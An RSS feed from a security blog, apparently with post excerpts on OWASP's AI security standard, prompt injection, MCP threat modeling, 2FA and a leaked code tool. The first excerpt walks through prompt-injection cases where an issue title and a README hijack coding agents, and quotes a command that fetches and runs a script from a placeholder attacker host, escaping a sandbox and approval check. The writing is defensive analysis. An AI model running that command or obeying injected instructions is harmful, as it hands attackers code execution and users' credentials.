<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Appsec on Napat&#39;s Inverse Blog</title>
    <link>/tags/appsec/</link>
    <description>Recent content in Appsec on Napat&#39;s Inverse Blog</description>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Wed, 01 Apr 2026 21:26:00 +0700</lastBuildDate>
    <atom:link href="/tags/appsec/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>The First Real Standard for AI Security: What OWASP AISVS Gets Right, What It Misses, and What You Should Actually Do</title>
      <link>/2026-04-01-the-first-real-standard-for-ai-security-what-owasp-aisvs-gets-right-what-it-misses-and-what-you-should-actually-do/</link>
      <pubDate>Wed, 01 Apr 2026 21:26:00 +0700</pubDate>
      <guid>/2026-04-01-the-first-real-standard-for-ai-security-what-owasp-aisvs-gets-right-what-it-misses-and-what-you-should-actually-do/</guid>
      <description>&lt;p&gt;We spent twenty years getting web security to a place where it was boring. Boring was good. Boring meant it mostly worked. You&amp;rsquo;d run your OWASP Top 10 scanner, fix the SQL injection and XSS findings, check the boxes on the ASVS, and ship. Not glamorous. But it worked.&lt;/p&gt;
&lt;p&gt;Then someone figured out you could steal a whole system&amp;rsquo;s secrets by asking it nicely.&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s not a metaphor. In February 2026, security researcher Adnan Khan showed that you could compromise Cline&amp;rsquo;s production releases — an AI coding tool used by millions of developers — by opening a GitHub issue with a carefully crafted title. The issue title contained a prompt injection payload that tricked Claude into running &lt;code&gt;npm install&lt;/code&gt; on a malicious package, which then poisoned the GitHub Actions cache and pivoted to steal the credentials that publish Cline&amp;rsquo;s VS Code extension. An issue title. Not a zero-day exploit, not a nation-state attack chain. Words in a text field.&lt;/p&gt;
&lt;p&gt;This is the fundamental problem with AI security, and it&amp;rsquo;s the reason OWASP wrote the AI Security Verification Standard (AISVS). Traditional AppSec assumes deterministic programs: the code does what you wrote. Maybe what you wrote was wrong — a SQL injection, a buffer overflow — but the code executes faithfully. Fix the bug, it stays fixed. AI systems are probabilistic. The model doesn&amp;rsquo;t execute instructions; it generates plausible continuations. You can have perfect code, proper input validation, encrypted storage — and still get owned because someone hid instructions in a README file that the model decided to follow instead of yours.&lt;/p&gt;
&lt;p&gt;Here&amp;rsquo;s the uncomfortable truth: many teams deploying AI today use API-based models they don&amp;rsquo;t control. They can&amp;rsquo;t inspect training data or run adversarial evaluations against someone else&amp;rsquo;s model. AISVS describes a comprehensive posture; most teams consuming foundation models through APIs control maybe 10% of it. I&amp;rsquo;ll come back to this.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id=&#34;the-three-chapters-that-matter-most&#34;&gt;The Three Chapters That Matter Most&lt;/h2&gt;
&lt;p&gt;AISVS spans 14 chapters covering everything from training data provenance to human oversight. Rather than walking through all of them — you can read the spec yourself — I want to focus on the three that should be on every security engineer&amp;rsquo;s radar right now.&lt;/p&gt;
&lt;h3 id=&#34;c2-user-input-validation--the-prompt-injection-chapter&#34;&gt;C2: User Input Validation — The Prompt Injection Chapter&lt;/h3&gt;
&lt;p&gt;This is the chapter you implement first. Prompt injection is the SQL injection of AI systems: well-understood, frequently demonstrated, and still not consistently defended against. The Snowflake Cortex AI sandbox escape in March 2026 demonstrated this clearly. PromptArmor found that an indirect prompt injection hidden in a GitHub repository&amp;rsquo;s README could manipulate Snowflake&amp;rsquo;s Cortex Agent into executing &lt;code&gt;cat &amp;lt; &amp;lt;(sh &amp;lt; &amp;lt;(wget -q0- https://ATTACKER_URL.com/bugbot))&lt;/code&gt; — bypassing the human-in-the-loop approval system because the command validation didn&amp;rsquo;t inspect code inside process substitution expressions. The agent then set a flag to execute outside the sandbox, downloaded malware, and used cached Snowflake tokens to exfiltrate data and drop tables. Two days after release. Fixed, but instructive.&lt;/p&gt;
&lt;p&gt;AISVS C2 decomposes prompt injection defense into specific, testable controls. Requirement 2.1.1 mandates that all external inputs be treated as untrusted and screened by a prompt injection detection ruleset or classifier. Requirement 2.1.2 requires instruction hierarchy enforcement — system and developer messages must override user instructions across multi-step interactions. This is directly relevant to attacks like Clinejection, where the injected payload rode in through an issue title that was interpolated into the prompt without sanitization.&lt;/p&gt;
&lt;p&gt;The chapter also addresses subtler vectors. Requirement 2.2.1 mandates Unicode normalization before tokenization — homoglyph swaps and invisible control characters are a real bypass technique against naive input filters. Section 2.7 covers multi-modal validation: text extracted from images and audio must be treated as untrusted per 2.1.1, and files must be scanned for steganographic payloads before ingestion.&lt;/p&gt;
&lt;p&gt;For practitioners: start with 2.1.1 (prompt injection screening), 2.1.2 (instruction hierarchy), 2.4.1 (explicit input schemas), and 2.7.2 (treat extracted text as untrusted). That&amp;rsquo;s your Level 1 baseline.&lt;/p&gt;
&lt;h3 id=&#34;c9-autonomous-orchestration--the-agentic-risk-chapter&#34;&gt;C9: Autonomous Orchestration — The Agentic Risk Chapter&lt;/h3&gt;</description>
    </item>
    <item>
      <title>Inside the Machine: What a Leaked Agentic Code Tool Reveals About AI Security</title>
      <link>/ai-analysis/inside-the-machine-what-agentic-code-tool-source-reveals-about-ai-security/</link>
      <pubDate>Tue, 31 Mar 2026 20:30:00 +0700</pubDate>
      <guid>/ai-analysis/inside-the-machine-what-agentic-code-tool-source-reveals-about-ai-security/</guid>
      <description>&lt;p&gt;In March 2026, someone extracted the complete source code of Claude Code from an npm package and published it to GitHub. No modifications. No commentary. Excluding generated code, lock files, and test fixtures — roughly 512,000 lines of TypeScript, dumped into a repository with a single commit.&lt;/p&gt;
&lt;p&gt;How this happened is itself a security lesson. Anthropic published version 2.1.88 of their npm package with a production source map file — &lt;code&gt;cli.js.map&lt;/code&gt;, weighing in at 59.8 MB — that contained the original TypeScript source, comments and all. A misconfigured &lt;code&gt;.npmignore&lt;/code&gt; or a build pipeline that skipped artifact scanning, depending on who you ask. The file was there for anyone to extract. Security researcher Chaofan Shou was the first to notice.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Agent Security Gap</title>
      <link>/2026-03-30-the-agent-security-gap/</link>
      <pubDate>Mon, 30 Mar 2026 10:05:00 +0700</pubDate>
      <guid>/2026-03-30-the-agent-security-gap/</guid>
      <description>&lt;h2 id=&#34;why-adversarial-prompt-engineering-is-not-the-problem--and-what-actually-is&#34;&gt;Why adversarial prompt engineering is not the problem — and what actually is&lt;/h2&gt;
&lt;p&gt;In early 2023, a group of researchers demonstrated something that made security people uncomfortable and product people dismissive.&lt;/p&gt;
&lt;p&gt;They showed that a language model could be instructed to do things its creators never intended, not by the person using it, but by content it was asked to process.&lt;/p&gt;
&lt;p&gt;The paper was called &amp;ldquo;Not what you&amp;rsquo;ve signed up for.&amp;rdquo; The attack was called indirect prompt injection.&lt;/p&gt;
&lt;p&gt;Three years later, the industry still has not fully absorbed the lesson.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id=&#34;the-fixation-on-prompt-injection&#34;&gt;The fixation on prompt injection&lt;/h2&gt;
&lt;p&gt;If you follow AI security discourse, you would think prompt injection is the central problem. It dominates conference talks. It tops the OWASP list. It generates endless proof-of-concept videos.&lt;/p&gt;
&lt;p&gt;And it should get attention. It is a real vulnerability.&lt;/p&gt;
&lt;p&gt;But the fixation on prompt injection obscures a more important truth: prompt injection is a symptom, not the disease.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Two-Factor Authentication Is Not What You Think</title>
      <link>/2026-03-27-two-factor-authentication-is-not-what-you-think/</link>
      <pubDate>Fri, 27 Mar 2026 13:15:22 +0700</pubDate>
      <guid>/2026-03-27-two-factor-authentication-is-not-what-you-think/</guid>
      <description>&lt;p&gt;Most people believe they understand 2FA. You have a password. You have an app that generates a six-digit code. Two things. Two factors. You are protected.&lt;/p&gt;
&lt;p&gt;They are not entirely wrong. But they are right about the mechanics and wrong about what those mechanics actually guarantee.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;The original idea behind multi-factor authentication was elegant. Security researchers observed that any single secret can leak. Passwords get stolen. Databases get breached. So they proposed combining secrets from fundamentally different &lt;em&gt;categories&lt;/em&gt;: something you &lt;em&gt;know&lt;/em&gt;, something you &lt;em&gt;have&lt;/em&gt;, something you &lt;em&gt;are&lt;/em&gt;. The key insight was not the number of steps — it was orthogonality. A thief who steals your password from a server breach still cannot log in because they do not physically possess your phone. The factors are independent. Compromise one, and the other remains intact.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The USB-C Metaphor Hides the Hard Part</title>
      <link>/2026-03-22-the-usb-c-metaphor-hides-the-hard-part/</link>
      <pubDate>Sun, 22 Mar 2026 15:59:00 +0700</pubDate>
      <guid>/2026-03-22-the-usb-c-metaphor-hides-the-hard-part/</guid>
      <description>&lt;h2 id=&#34;threat-modeling-mcp-in-the-real-world&#34;&gt;Threat Modeling MCP in the Real World&lt;/h2&gt;
&lt;p&gt;People like to describe MCP as &amp;ldquo;USB-C for AI.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s a good line. It explains why people care.&lt;/p&gt;
&lt;p&gt;USB-C made hardware interoperability easier. MCP makes tool interoperability easier. Build once, connect everywhere, move faster.&lt;/p&gt;
&lt;p&gt;The problem with good metaphors is that they are usually true in one way and dangerously false in another.&lt;/p&gt;
&lt;p&gt;USB-C looks like a cable problem.
MCP looks like a protocol problem.&lt;/p&gt;
&lt;p&gt;But the hard part isn&amp;rsquo;t the connector. The hard part is delegation.&lt;/p&gt;
&lt;p&gt;When an AI client connects to tools through MCP, it is not just moving data. It is moving authority: who can read what, who can trigger what, and under which identity.&lt;/p&gt;
&lt;p&gt;That shift is what many threat models miss.&lt;/p&gt;
&lt;p&gt;They evaluate MCP like an integration layer, when they should evaluate it like an authorization fabric.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id=&#34;why-this-matters-now&#34;&gt;Why this matters now&lt;/h2&gt;
&lt;p&gt;Standards compress engineering cost. They also compress attacker learning curves.&lt;/p&gt;
&lt;p&gt;Before MCP, every integration had custom quirks. That was messy for developers and inconvenient for attackers. With standardization, we gain velocity and lose diversity. A weakness in common implementation patterns becomes reusable across many environments.&lt;/p&gt;
&lt;p&gt;This doesn&amp;rsquo;t mean MCP is unsafe. It means MCP is now important enough to threat model as first-class infrastructure.&lt;/p&gt;
&lt;p&gt;The teams that do this early will avoid the coming cycle: rapid adoption, soft defaults, then expensive retrofitting under incident pressure.&lt;/p&gt;
&lt;hr&gt;</description>
    </item>
    <item>
      <title>Frameworks Don’t Ship</title>
      <link>/2026-03-22-frameworks-dont-ship/</link>
      <pubDate>Sun, 22 Mar 2026 08:01:00 +0700</pubDate>
      <guid>/2026-03-22-frameworks-dont-ship/</guid>
      <description>&lt;h2 id=&#34;turning-nist-ai-rmf--the-genai-profile-into-an-appsec-backlog-that-actually-changes-risk&#34;&gt;Turning NIST AI RMF + the GenAI Profile into an AppSec Backlog That Actually Changes Risk&lt;/h2&gt;
&lt;p&gt;There is a recurring mistake in security.&lt;/p&gt;
&lt;p&gt;We mistake agreement for execution.&lt;/p&gt;
&lt;p&gt;A team says they are “aligned to a framework,” and everyone relaxes. The slide looks good. The architecture review sounds mature. The policy document has all the right words.&lt;/p&gt;
&lt;p&gt;Then an incident happens, and we discover the ugly truth: nouns don’t defend systems. Verbs do.&lt;/p&gt;
&lt;p&gt;A framework is mostly nouns.
Engineering is mostly verbs.&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
